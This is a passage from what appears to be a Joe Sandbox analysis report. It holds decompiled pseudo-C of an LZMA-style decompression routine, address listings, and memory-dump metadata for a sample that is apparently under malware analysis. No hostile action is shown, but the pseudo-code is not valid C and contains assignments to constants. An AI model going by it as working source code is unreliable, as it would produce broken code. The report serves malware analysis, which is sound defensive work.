                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      											goto L132;
                      										case 8:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xa;
                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      											} else {
                      												__eax =  *(__ebp - 0x38);
                      												__ecx =  *(__ebp - 4);
                      												__eax =  *(__ebp - 0x38) + 0xf;
                      												 *(__ebp - 0x84) = 9;
                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      											}
                      											goto L132;
                      										case 9:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												goto L90;
                      											}
                      											__eflags =  *(__ebp - 0x60);
                      											if( *(__ebp - 0x60) == 0) {
                      												goto L171;
                      											}
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                      											__eflags = _t259;
                      											0 | _t259 = _t259 + _t259 + 9;
                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                      											goto L76;
                      										case 0xa:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xb;
                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											__eax =  *(__ebp - 0x28);
                      											goto L89;
                      										case 0xb:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__ecx =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x20);
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      											} else {
                      												__eax =  *(__ebp - 0x24);
                      											}
                      											__ecx =  *(__ebp - 0x28);
                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      											L89:
                      											__ecx =  *(__ebp - 0x2c);
                      											 *(__ebp - 0x2c) = __eax;
                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      											L90:
                      											__eax =  *(__ebp - 4);
                      											 *(__ebp - 0x80) = 0x15;
                      											__eax =  *(__ebp - 4) + 0xa68;
                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      											goto L69;
                      										case 0xc:
                      											L100:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xc;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t335 = __ebp - 0x70;
                      											 *_t335 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t335;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											__eax =  *(__ebp - 0x2c);
                      											goto L102;
                      										case 0xd:
                      											L37:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xd;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t122 = __ebp - 0x70;
                      											 *_t122 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t122;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L39:
                      											__eax =  *(__ebp - 0x40);
                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      												goto L48;
                      											}
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												goto L54;
                      											}
                      											L41:
                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      											 *(__ebp - 0x48) = __eax;
                      											__eax = __eax + 1;
                      											__eax = __eax << 8;
                      											__eax = __eax + __ebx;
                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edx = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												 *(__ebp - 0x40) = 1;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												__ebx = __ebx + __ebx + 1;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edx;
                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L39;
                      											} else {
                      												goto L37;
                      											}
                      										case 0xe:
                      											L46:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t156 = __ebp - 0x70;
                      											 *_t156 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t156;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											while(1) {
                      												L48:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t170 = __edx + 1; // 0x1
                      													__ebx = _t170;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													continue;
                      												} else {
                      													goto L46;
                      												}
                      											}
                      											L54:
                      											_t173 = __ebp - 0x34;
                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      											__eflags =  *_t173;
                      											goto L55;
                      										case 0xf:
                      											L58:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xf;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t203 = __ebp - 0x70;
                      											 *_t203 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t203;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L60:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												L55:
                      												__al =  *(__ebp - 0x44);
                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      												goto L56;
                      											}
                      											L61:
                      											__eax =  *(__ebp - 0x58);
                      											__edx = __ebx + __ebx;
                      											__ecx =  *(__ebp - 0x10);
                      											__esi = __edx + __eax;
                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edi = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												_t217 = __edx + 1; // 0x1
                      												__ebx = _t217;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edi;
                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L60;
                      											} else {
                      												goto L58;
                      											}
                      										case 0x10:
                      											L110:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0x10;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t366 = __ebp - 0x70;
                      											 *_t366 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t366;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											goto L112;
                      										case 0x11:
                      											L69:
                      											__esi =  *(__ebp - 0x58);
                      											 *(__ebp - 0x84) = 0x12;
                      											L132:
                      											 *(_t612 - 0x54) = _t605;
                      											goto L133;
                      										case 0x12:
                      											goto L0;
                      										case 0x13:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												_t469 = __ebp - 0x58;
                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                      												__eflags =  *_t469;
                      												 *(__ebp - 0x30) = 0x10;
                      												 *(__ebp - 0x40) = 8;
                      												goto L144;
                      											}
                      											__eax =  *(__ebp - 0x4c);
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											 *(__ebp - 0x30) = 8;
                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      											goto L130;
                      										case 0x14:
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      											__eax =  *(__ebp - 0x80);
                      											L140:
                      											 *(_t612 - 0x88) = _t533;
                      											goto L1;
                      										case 0x15:
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      											__al = __al & 0x000000fd;
                      											__eax = (__eflags >= 0) - 1 + 0xb;
                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      											goto L121;
                      										case 0x16:
                      											__eax =  *(__ebp - 0x30);
                      											__eflags = __eax - 4;
                      											if(__eax >= 4) {
                      												_push(3);
                      												_pop(__eax);
                      											}
                      											__ecx =  *(__ebp - 4);
                      											 *(__ebp - 0x40) = 6;
                      											__eax = __eax << 7;
                      											 *(__ebp - 0x7c) = 0x19;
                      											 *(__ebp - 0x58) = __eax;
                      											goto L145;
                      										case 0x17:
                      											goto L145;
                      										case 0x18:
                      											L146:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0x18;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t484 = __ebp - 0x70;
                      											 *_t484 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t484;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L148:
                      											_t487 = __ebp - 0x48;
                      											 *_t487 =  *(__ebp - 0x48) - 1;
                      											__eflags =  *_t487;
                      											goto L149;
                      										case 0x19:
                      											__eflags = __ebx - 4;
                      											if(__ebx < 4) {
                      												 *(__ebp - 0x2c) = __ebx;
                      												L120:
                      												_t394 = __ebp - 0x2c;
                      												 *_t394 =  *(__ebp - 0x2c) + 1;
                      												__eflags =  *_t394;
                      												L121:
                      												__eax =  *(__ebp - 0x2c);
                      												__eflags = __eax;
                      												if(__eax == 0) {
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      													goto L170;
                      												}
                      												__eflags = __eax -  *(__ebp - 0x60);
                      												if(__eax >  *(__ebp - 0x60)) {
                      													goto L171;
                      												}
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      												__eax =  *(__ebp - 0x30);
                      												_t401 = __ebp - 0x60;
                      												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      												__eflags =  *_t401;
                      												goto L124;
                      											}
                      											__ecx = __ebx;
                      											__eax = __ebx;
                      											__ecx = __ebx >> 1;
                      											__eax = __ebx & 0x00000001;
                      											__ecx = (__ebx >> 1) - 1;
                      											__al = __al | 0x00000002;
                      											__eax = (__ebx & 0x00000001) << __cl;
                      											__eflags = __ebx - 0xe;
                      											 *(__ebp - 0x2c) = __eax;
                      											if(__ebx >= 0xe) {
                      												__ebx = 0;
                      												 *(__ebp - 0x48) = __ecx;
                      												L103:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													__eax = __eax + __ebx;
                      													 *(__ebp - 0x40) = 4;
                      													 *(__ebp - 0x2c) = __eax;
                      													__eax =  *(__ebp - 4);
                      													__eax =  *(__ebp - 4) + 0x644;
                      													__eflags = __eax;
                      													L109:
                      													__ebx = 0;
                      													 *(__ebp - 0x58) = __eax;
                      													 *(__ebp - 0x50) = 1;
                      													 *(__ebp - 0x44) = 0;
                      													 *(__ebp - 0x48) = 0;
                      													L113:
                      													__eax =  *(__ebp - 0x40);
                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      														_t392 = __ebp - 0x2c;
                      														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                      														__eflags =  *_t392;
                      														goto L120;
                      													}
                      													__eax =  *(__ebp - 0x50);
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      													__eax =  *(__ebp - 0x58);
                      													__esi = __edi + __eax;
                      													 *(__ebp - 0x54) = __esi;
                      													__ax =  *__esi;
                      													__ecx = __ax & 0x0000ffff;
                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      													__eflags =  *(__ebp - 0xc) - __edx;
                      													if( *(__ebp - 0xc) >= __edx) {
                      														__ecx = 0;
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      														__ecx = 1;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      														__ebx = 1;
                      														__ecx =  *(__ebp - 0x48);
                      														__ebx = 1 << __cl;
                      														__ecx = 1 << __cl;
                      														__ebx =  *(__ebp - 0x44);
                      														__ebx =  *(__ebp - 0x44) | __ecx;
                      														__cx = __ax;
                      														__cx = __ax >> 5;
                      														__eax = __eax - __ecx;
                      														__edi = __edi + 1;
                      														__eflags = __edi;
                      														 *(__ebp - 0x44) = __ebx;
                      														 *__esi = __ax;
                      														 *(__ebp - 0x50) = __edi;
                      													} else {
                      														 *(__ebp - 0x10) = __edx;
                      														0x800 = 0x800 - __ecx;
                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      														 *__esi = __dx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L112:
                      														_t369 = __ebp - 0x48;
                      														 *_t369 =  *(__ebp - 0x48) + 1;
                      														__eflags =  *_t369;
                      														goto L113;
                      													} else {
                      														goto L110;
                      													}
                      												}
                      												__ecx =  *(__ebp - 0xc);
                      												__ebx = __ebx + __ebx;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      													__ecx =  *(__ebp - 0x10);
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													__ebx = __ebx | 0x00000001;
                      													__eflags = __ebx;
                      													 *(__ebp - 0x44) = __ebx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													L102:
                      													_t339 = __ebp - 0x48;
                      													 *_t339 =  *(__ebp - 0x48) - 1;
                      													__eflags =  *_t339;
                      													goto L103;
                      												} else {
                      													goto L100;
                      												}
                      											}
                      											__edx =  *(__ebp - 4);
                      											__eax = __eax - __ebx;
                      											 *(__ebp - 0x40) = __ecx;
                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      											goto L109;
                      										case 0x1a:
                      											L56:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												 *(__ebp - 0x88) = 0x1a;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x68);
                      											__al =  *(__ebp - 0x5c);
                      											__edx =  *(__ebp - 8);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      											 *( *(__ebp - 0x68)) = __al;
                      											__ecx =  *(__ebp - 0x14);
                      											 *(__ecx +  *(__ebp - 8)) = __al;
                      											__eax = __ecx + 1;
                      											__edx = 0;
                      											_t192 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t192;
                      											goto L80;
                      										case 0x1b:
                      											L76:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												 *(__ebp - 0x88) = 0x1b;
                      												goto L170;
                      											}
                      											__eax =  *(__ebp - 0x14);
                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      											__eflags = __eax -  *(__ebp - 0x74);
                      											if(__eax >=  *(__ebp - 0x74)) {
                      												__eax = __eax +  *(__ebp - 0x74);
                      												__eflags = __eax;
                      											}
                      											__edx =  *(__ebp - 8);
                      											__cl =  *(__eax + __edx);
                      											__eax =  *(__ebp - 0x14);
                      											 *(__ebp - 0x5c) = __cl;
                      											 *(__eax + __edx) = __cl;
                      											__eax = __eax + 1;
                      											__edx = 0;
                      											_t275 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t275;
                      											__eax =  *(__ebp - 0x68);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											_t284 = __ebp - 0x64;
                      											 *_t284 =  *(__ebp - 0x64) - 1;
                      											__eflags =  *_t284;
                      											 *( *(__ebp - 0x68)) = __cl;
                      											L80:
                      											 *(__ebp - 0x14) = __edx;
                      											goto L81;
                      										case 0x1c:
                      											while(1) {
                      												L124:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t415 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t415;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      												__eflags =  *(__ebp - 0x30);
                      												 *( *(__ebp - 0x68)) = __cl;
                      												 *(__ebp - 0x14) = _t415;
                      												if( *(__ebp - 0x30) > 0) {
                      													continue;
                      												} else {
                      													L81:
                      													 *(__ebp - 0x88) = 2;
                      													goto L1;
                      												}
                      											}
                      											 *(__ebp - 0x88) = 0x1c;
                      											L170:
                      											_push(0x22);
                      											_pop(_t567);
                      											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                      											_t535 = 0;
                      											L172:
                      											return _t535;
                      									}
                      								}
                      								L171:
                      								_t535 = _t534 | 0xffffffff;
                      								goto L172;
                      							}
                      						}
                      						__eax =  *(__ebp - 0x50);
                      						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      						__eax =  *(__ebp - 0x58);
                      						__esi = __edx + __eax;
                      						 *(__ebp - 0x54) = __esi;
                      						__ax =  *__esi;
                      						__edi = __ax & 0x0000ffff;
                      						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      						if( *(__ebp - 0xc) >= __ecx) {
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      							__cx = __ax;
                      							__cx = __ax >> 5;
                      							__eax = __eax - __ecx;
                      							__edx = __edx + 1;
                      							 *__esi = __ax;
                      							 *(__ebp - 0x50) = __edx;
                      						} else {
                      							 *(__ebp - 0x10) = __ecx;
                      							0x800 = 0x800 - __edi;
                      							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      							 *__esi = __cx;
                      						}
                      						if( *(__ebp - 0x10) >= 0x1000000) {
                      							goto L148;
                      						} else {
                      							goto L146;
                      						}
                      					}
                      					goto L1;
                      				}
                      			}








                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068d2
                      0x004068d8
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00406811
                      0x00000000
                      0x00406686

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
